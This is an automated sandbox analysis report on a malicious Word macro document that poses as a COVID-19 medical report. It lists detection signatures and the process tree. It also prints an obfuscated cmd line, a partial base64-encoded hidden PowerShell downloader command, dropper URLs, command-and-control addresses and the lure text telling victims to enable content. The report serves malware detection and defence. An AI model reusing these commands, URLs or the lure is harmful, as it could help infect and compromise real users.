
Analysis Report XP-9743 Medical report COVID-19.doc

Overview

General Information

Sample Name: XP-9743 Medical report COVID-19.doc
Analysis ID: 338773
MD5: da92c55d4b08367fb79a6bc6ae4da985
SHA1: 8ee3239cfb5dd7d9ddd8e503c8fec19e21ca3c3d
SHA256: 137602cebf7c61fe1bb6647160167813271afbd74a52fcccf03a0ad590a9ef61


Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Document contains an embedded VBA with many randomly named variables
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Obfuscated command line found
Potential dropper URLs found in powershell memory
Powershell drops PE file
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2336 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • cmd.exe (PID: 1100 cmdline: cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 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 MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
    • msg.exe (PID: 2572 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)
    • powershell.exe (PID: 2552 cmdline: powershell -w hidden -enc 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 MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • rundll32.exe (PID: 2332 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll ShowDialogA MD5: DD81D91FF3B0763C392422865C9AC12E)
        • rundll32.exe (PID: 2760 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll ShowDialogA MD5: 51138BEEA3E2C21EC44D0932C71762A8)
          • rundll32.exe (PID: 2732 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Giyrh\pugu.vsm',ShowDialogA MD5: 51138BEEA3E2C21EC44D0932C71762A8)
            • rundll32.exe (PID: 1980 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ivtnyogqxjx\ctmhexvkrv.xdn',ShowDialogA MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 2724 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pvbzatsazzovzkv\hcdstjffkhswof.tvm',ShowDialogA MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 2500 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ipdtn\rmgx.ktd',ShowDialogA MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 1776 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wxiibgduobebnp\hfpumnmgeezpt.jsh',ShowDialogA MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                    • rundll32.exe (PID: 2808 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ndsevdxfleyh\dktakeexwon.agz',ShowDialogA MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                      • rundll32.exe (PID: 3068 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fmtjatw\czosow.gcn',ShowDialogA MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                        • rundll32.exe (PID: 3012 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Udumexhq\tqqkqid.sqp',ShowDialogA MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Suspicious Encoded PowerShell Command Line
Source: Process startedAuthor: Florian Roth, Markus Neis: Data: Command: powershell -w hidden -enc IAAgACQAOABaAEcAIAAgAD0AIABbAHQAWQBwAGUAXQAoACIAewAyAH0AewA1AH0AewAwAH0AewAxAH0AewAzAH0AewA0AH0AIgAtAGYAIAAnAFQARQAnACwAJwBtAC4AJwAsACcAUwB5ACcALAAnAGkAbwAnACwAJwAuAEQASQByAEUAQwB0AE8AUgBZACcALAAnAFMAJwApADsAIAAgACAAJABEADAAQwBxACAAPQAgAFsAVABZAHAAZQBdACgAIgB7ADIAfQB7ADEAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAcwBFAHIAdgBJAEMARQBQAG8AJwAsACcAVABlAG0ALgBuAEUAdAAuACcALAAnAFMAWQBzACcALAAnAGkATgB0AG0AYQAnACwAJwBuAEEARwBFAFIAJwApACAAOwAgACQASgBiAHoAMwB5AGEAYQA9ACQARAA1ADMARQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUgA3ADYAUAA7ACQARwA3ADMATwA9ACgAJwBGACcAKwAoACcAMAAnACsAJwA0AFYAJwApACkAOwAgACAAKAAgACAARwBlAHQALQBWAGEAcgBJAEEAQgBsAGUAIAAoACIAOABaACIAKwAiAGcAIgApACAAIAAtAHYAQQBsAFUAZQBPAE4AIAApADoAOgAiAGMAcgBFAGAAQQBgAFQAZQBEAGkAUgBgAGUAQwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB0AEsAJwArACgAJwBMACcAKwAnAEsAJwArACcAagBsADQAOABrAHIAJwApACsAJwB0ACcAKwAoACcASwBMAE4AcQAnACsAJwBtADkAJwApACsAKAAnAHQAJwArACcAeQA5ACcAKQArACcAdAAnACsAJwBLAEwAJwApAC0AcgBlAHAAbABBAGMAZQAgACAAKAAnAHQASwAnACsAJwBMACcAKQAsAFsAQwBIAEEAcgBdADkAMgApACkAOwAkAFAANAAzAFcAPQAoACgAJwBVAF8AJwArACcAMgAnACkAKwAnAFAAJwApADsAIAAgACgAIAAgAGMAaABJAEwAZABpAFQAZQBNACAAVgBhAHIASQBBAEIAbABFADoAZAAwAGMAcQAgACAAKQAuAHYAYQBMAHUAZQA6ADoAIgBzAGAAZQBjAFUAUgBJAHQAYABZAHAAUgBPAHQAYABPAEMAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAMQAnACkAKwAnADIAJwApADsAJABTADgAMgBHAD0AKAAoACcARwA5ACcAKwAnADAAJwApACsAJwBNACcAKQA7ACQARAA2AHQAcgB3ADAAMgAgAD0AIAAoACgAJwBTADkAJwArACcAMwAnACkAKwAnAEUAJwApADsAJABYADYAXwBNAD0AKAAnAEQAMwAnACsAJwAwAFAAJwApADsAJABHADYAYQBqAHYAOABkAD0AJABIAE8ATQBFACsAKAAoACcAewAwACcAKwAnAH0ASwBqAGwANAA4AGsAcgAnACsAJwB7ADAAfQBOAHEAJwArACgAJwBtADkAdAB5ACcAKwAnADkAJwApACsAJwB7ADAAfQAnACkALQBmACAAIABbAEMASABhAHIAXQA5ADIAKQArACQARAA2AHQAcgB3ADAAMgArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFYAMwA1AFUAPQAoACgAJwBTADUAJwArACcAXwAnACkAKwAnAFUAJwApADsAJABKAGkAdABvAGEAMgBlAD0AKAAoACcAdwBdAHgAbQBbAHYAcwAnACsAJwA6AC8ALwByA
GUAbQBlAGQAJwArACcAaQBpACcAKwAnAHMALgAnACsAJwBjACcAKwAnAG8AJwArACcAbQAvAHQALwBnAG0AMgBYAC8AQAAnACsAJwB3ACcAKQArACgAJwBdAHgAJwArACcAbQBbAHYAOgAnACsAJwAvAC8AYQB2AGEAJwApACsAKAAnAGQAbgAnACsAJwBhAG4AJwApACsAKAAnAHMAYQAnACsAJwBoACcAKQArACcAaQBuACcAKwAoACcALgBjACcAKwAnAG8AbQAnACkAKwAoACcALwAnACsAJwB3AHAAJwArACcALQBpAG4AYwAnACkAKwAnAGwAdQAnACsAKAAnAGQAZQAnACsAJwBzAC8AdwAvAEAAJwApACsAJwB3ACcAKwAnAF0AJwArACgAJwB4ACcAKwAnAG0AWwAnACkAKwAoACcAdgA6AC8ALwAnACsAJwBzAG8AbAAnACsAJwBpAGMAbwAnACkAKwAnAG4AJwArACgAJwAuAHUAcwAnACsAJwAvAGEAbABsAGEAJwArACcAbQAnACsAJwAtAGMAeQAnACkAKwAoACcAYwBsAGUAJwArACcALQAxAGMANAAnACkAKwAoACcAZwBuACcAKwAnAC8AZgA1ACcAKQArACcAegAvACcAKwAoACcAQAAnACsAJwB3AF0AJwApACsAKAAnAHgAJwArACcAbQBbACcAKwAnAHYAOgAvACcAKwAnAC8AdwB3AHcALgByAGkAcABhAHIAYQB6AGkAJwArACcAbwBuACcAKwAnAGkAJwArACcALQAnACkAKwAoACcAcgBhAGQAaQAnACsAJwBvACcAKQArACcAdAB2ACcAKwAnAC4AYwAnACsAKAAnAG8AbQAnACsAJwAvAHMAbwAnACkAKwAnAGYAdAAnACsAKAAnAGEAYwAnACsAJwB1ACcAKQArACgAJwBsACcAKwAnAG8AdQBzAC8AJwArACcARABaAHoALwAnACkAKwAnAEAAJwArACgAJwB3ACcAKwAnAF0AeABtAFsAJwApACsAKAAnAHYAO

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://hellas-darmstadt.de/cgi-bin/ZSoo/ | Avira URL Cloud: Label: malware
Source: http://solicon.us/allam-cycle-1c4gn/f5z/ | Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: http://hellas-darmstadt.de/cgi-bin/ZSoo/ | Virustotal: Detection: 6%
Source: http://solicon.us/allam-cycle-1c4gn/f5z/ | Virustotal: Detection: 6%
Multi AV Scanner detection for submitted file
Source: XP-9743 Medical report COVID-19.doc | Virustotal: Detection: 19%
Source: XP-9743 Medical report COVID-19.doc | ReversingLabs: Detection: 13%
Machine Learning detection for dropped file
Source: C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll | Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\mscorlib.pdb.dll source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb* source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2088678601.0000000002840000.00000002.00000001.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: global traffic | DNS query: name: remediis.com
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 5.2.81.171:443
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 5.2.81.171:443

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2404340 ET CNC Feodo Tracker Reported CnC Server TCP group 21 192.168.2.22:49168 -> 71.72.196.159:80
Potential dropper URLs found in powershell memory
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmp | String found in memory: https://remediis.com/t/gm2X/
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmp | String found in memory: http://avadnansahin.com/wp-includes/w/
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmp | String found in memory: http://solicon.us/allam-cycle-1c4gn/f5z/
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmp | String found in memory: http://www.riparazioni-radiotv.com/softaculous/DZz/
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmp | String found in memory: http://www.agricampeggiocortecomotto.it/wp-admin/s7p1/
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmp | String found in memory: https://www.starlingtechs.com/GNM/
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmp | String found in memory: http://hellas-darmstadt.de/cgi-bin/ZSoo/
Source: global traffic | HTTP traffic detected: GET /wp-includes/w/ HTTP/1.1 | Host: avadnansahin.com | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 71.72.196.159 71.72.196.159
Source: Joe Sandbox View | IP Address: 71.72.196.159 71.72.196.159
Source: Joe Sandbox View | ASN Name: AEROTEK-ASTR AEROTEK-ASTR
Source: Joe Sandbox View | ASN Name: TWC-10796-MIDWESTUS TWC-10796-MIDWESTUS
Source: Joe Sandbox View | ASN Name: ALASTYRTR ALASTYRTR
Source: global traffic | HTTP traffic detected: POST /fumwyj93myhz6vi/3lptbz7/e6hqkyw77ui/dujy6/2toe6aqef56s/cxrwnsqx/ HTTP/1.1 | DNT: 0 | Referer: 69.49.88.46/fumwyj93myhz6vi/3lptbz7/e6hqkyw77ui/dujy6/2toe6aqef56s/cxrwnsqx/ | Content-Type: multipart/form-data; boundary=-------------------HZtvsb4iqah9tnyW329 | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 69.49.88.46 | Content-Length: 5492 | Connection: Keep-Alive | Cache-Control: no-cache
Source: unknown | TCP traffic detected without corresponding DNS query: 71.72.196.159
Source: unknown | TCP traffic detected without corresponding DNS query: 71.72.196.159
Source: unknown | TCP traffic detected without corresponding DNS query: 69.49.88.46
Source: unknown | TCP traffic detected without corresponding DNS query: 69.49.88.46
Source: unknown | TCP traffic detected without corresponding DNS query: 69.49.88.46
Source: unknown | TCP traffic detected without corresponding DNS query: 69.49.88.46
Source: unknown | TCP traffic detected without corresponding DNS query: 69.49.88.46
Source: unknown | TCP traffic detected without corresponding DNS query: 69.49.88.46
Source: unknown | TCP traffic detected without corresponding DNS query: 69.49.88.46
Source: unknown | TCP traffic detected without corresponding DNS query: 69.49.88.46
Source: unknown | TCP traffic detected without corresponding DNS query: 69.49.88.46
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4AB68257-B28F-4AE5-86AD-026C320EA73C}.tmp
Source: global traffic | HTTP traffic detected: GET /wp-includes/w/ HTTP/1.1 | Host: avadnansahin.com | Connection: Keep-Alive
Source: rundll32.exe, 00000006.00000002.2092559720.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089009552.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091693708.0000000001D60000.00000002.00000001.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown | DNS traffic detected: queries for: remediis.com
Source: unknown | HTTP traffic detected: POST /fumwyj93myhz6vi/3lptbz7/e6hqkyw77ui/dujy6/2toe6aqef56s/cxrwnsqx/ HTTP/1.1 | DNT: 0 | Referer: 69.49.88.46/fumwyj93myhz6vi/3lptbz7/e6hqkyw77ui/dujy6/2toe6aqef56s/cxrwnsqx/ | Content-Type: multipart/form-data; boundary=-------------------HZtvsb4iqah9tnyW329 | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 69.49.88.46 | Content-Length: 5492 | Connection: Keep-Alive | Cache-Control: no-cache
Source: powershell.exe, 00000005.00000002.2093523040.0000000003C70000.00000004.00000001.sdmp | String found in binary or memory: http://avadnansahin.com
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmp | String found in binary or memory: http://avadnansahin.com/wp-includes/w/
Source: powershell.exe, 00000005.00000002.2093523040.0000000003C70000.00000004.00000001.sdmp | String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: powershell.exe, 00000005.00000002.2093523040.0000000003C70000.00000004.00000001.sdmp | String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmp | String found in binary or memory: http://hellas-darmstadt.de/cgi-bin/ZSoo/
Source: rundll32.exe, 00000006.00000002.2092559720.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089009552.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091693708.0000000001D60000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000006.00000002.2092559720.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089009552.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091693708.0000000001D60000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000006.00000002.2092843874.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089320581.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.2100702841.0000000001E87000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000006.00000002.2092843874.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089320581.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.2100702841.0000000001E87000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2093523040.0000000003C70000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 00000005.00000002.2088032725.0000000002380000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2091689144.0000000002880000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2092831737.00000000027A0000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000006.00000002.2092843874.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089320581.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.2100702841.0000000001E87000.00000002.00000001.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmp | String found in binary or memory: http://solicon.us/allam-cycle-1c4gn/f5z/
Source: rundll32.exe, 00000006.00000002.2092843874.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089320581.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.2100702841.0000000001E87000.00000002.00000001.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2088032725.0000000002380000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2091689144.0000000002880000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2092831737.00000000027A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmp | String found in binary or memory: http://www.agricampeggiocortecomotto.it/wp-admin/s7p1/
Source: rundll32.exe, 00000006.00000002.2092559720.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089009552.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091693708.0000000001D60000.00000002.00000001.sdmp | String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000006.00000002.2092843874.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089320581.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.2100702841.0000000001E87000.00000002.00000001.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
Source: powershell.exe, 00000005.00000002.2093517208.0000000003C6E000.00000004.00000001.sdmp | String found in binary or memory: http://www.litespeedtech.com
Source: rundll32.exe, 00000006.00000002.2092559720.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089009552.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091693708.0000000001D60000.00000002.00000001.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000005.00000002.2086528973.0000000000404000.00000004.00000020.sdmp | String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000005.00000002.2086528973.0000000000404000.00000004.00000020.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmp | String found in binary or memory: http://www.riparazioni-radiotv.com/softaculous/DZz/
Source: rundll32.exe, 00000008.00000002.2091693708.0000000001D60000.00000002.00000001.sdmp | String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmp | String found in binary or memory: https://remediis.com
Source: powershell.exe, 00000005.00000002.2096044095.000000001B606000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmp | String found in binary or memory: https://remediis.com/t/gm2X/
Source: powershell.exe, 00000005.00000002.2093497581.0000000003C5C000.00000004.00000001.sdmp | String found in binary or memory: https://remediis.comp
Source: powershell.exe, 00000005.00000002.2093523040.0000000003C70000.00000004.00000001.sdmp | String found in binary or memory: https://sectigo.com/CPS0D
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmp | String found in binary or memory: https://www.starlingtechs.com/GNM/
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown | Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown | Network traffic detected: HTTP traffic on port 49166 -> 443

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 | Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words:
Source: Screenshot number: 4 | Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
Source: Screenshot number: 4 | Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4 | Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words: 12 N@m 13 ;a 10096 G
Source: Screenshot number: 8 | Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. O a S
Source: Screenshot number: 8 | Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Screenshot number: 8 | Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 8 | Screenshot OCR: ENABLE CONTENT" buttons to preview this document. O a S
Source: Document image extraction number: 0 | Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0 | Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0 | Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 | Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 | Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1 | Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1 | Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll
Very long command line found
Source: unknown | Process created: Commandline size = 5321
Source: unknown | Process created: Commandline size = 5220
Source: C:\Windows\System32\cmd.exe | Process created: Commandline size = 5220
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write
